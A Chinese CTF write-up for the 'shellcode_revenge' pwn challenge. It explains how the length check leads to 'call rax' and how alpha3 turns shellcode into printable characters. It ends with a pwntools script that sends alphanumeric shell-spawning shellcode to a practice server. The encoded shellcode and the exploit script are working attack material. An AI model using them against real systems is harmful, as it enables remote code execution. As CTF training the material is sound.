反编译失败了,所以只能看汇编还好不烦,看看汇编还是能看出来的
    ![{RH9W8G3I16R27MOD`KLYI.png 最终我们要跳转到这个地方才好,var_4这个地方最开始是0,var_8这个是输入的长度,上面有循环每次循环下去var_4这个会加一最后相等就行了就会去调用call rax,因为是长度比较,用sendline的话会多出一个回车,所有不能用sendline要用send。然后字符是要可见字符,所以单纯填shellcode是行不通的,然后有大哥是写了个把shellcode转为可见字符的东西
    image.png

    1. git clone https://github.com/TaQini/alpha3.git
    2. cd alpha3
    3. python ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode.txt">"输出文件重定位可以不加会在终端输出"

    因为shellcode有不可见字符,直接单纯输出肯定不行,所以要重定位到文件当中

    1.  #coding=utf8
    2. from pwn import *
    3. import sys
    4. from struct import pack
    5. context.log_level = 'debug'
    6. #io =process('./mrctf2020_shellcode_revenge')
    7. io =remote('node4.buuoj.cn',25392)
    8. #shellcode = asm(shellcraft.sh())
    9. shellcode  ="Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2O2u2E0Z7M7M0j7O2I1o0b0U2D1n060O0w2k2u0I2j132j0l2M120u0m2v10170l07100F0n2s120D0l012j1k152w1p130l2t121L0m0J100D11010J2u180a1k0k0H1l140n0m0H100w0l2v0W0B1P0n0H1L19000H0T131k0m2s0U170X2K0I1p0S0k0l2t0Q2p0m0J191L2w0g00"
    11. #standard_out = sys.stdout
    12. #sys.stdout = open('shellcode.txt',"w+")
    13. #print(shellcode)
    14. #sys.stdout.close()
    15. #sys.stdout = standard_out
    16. #print(len(shellcode))
    17. #payload = b'\x00'*8+shellcode
    18. io.recvuntil("Show me your magic!\n")    
    19. io.send(shellcode)
    20. io.interactive()
    21. #f = open(filename,'w+')
    22. #f.write(asm(shellcode))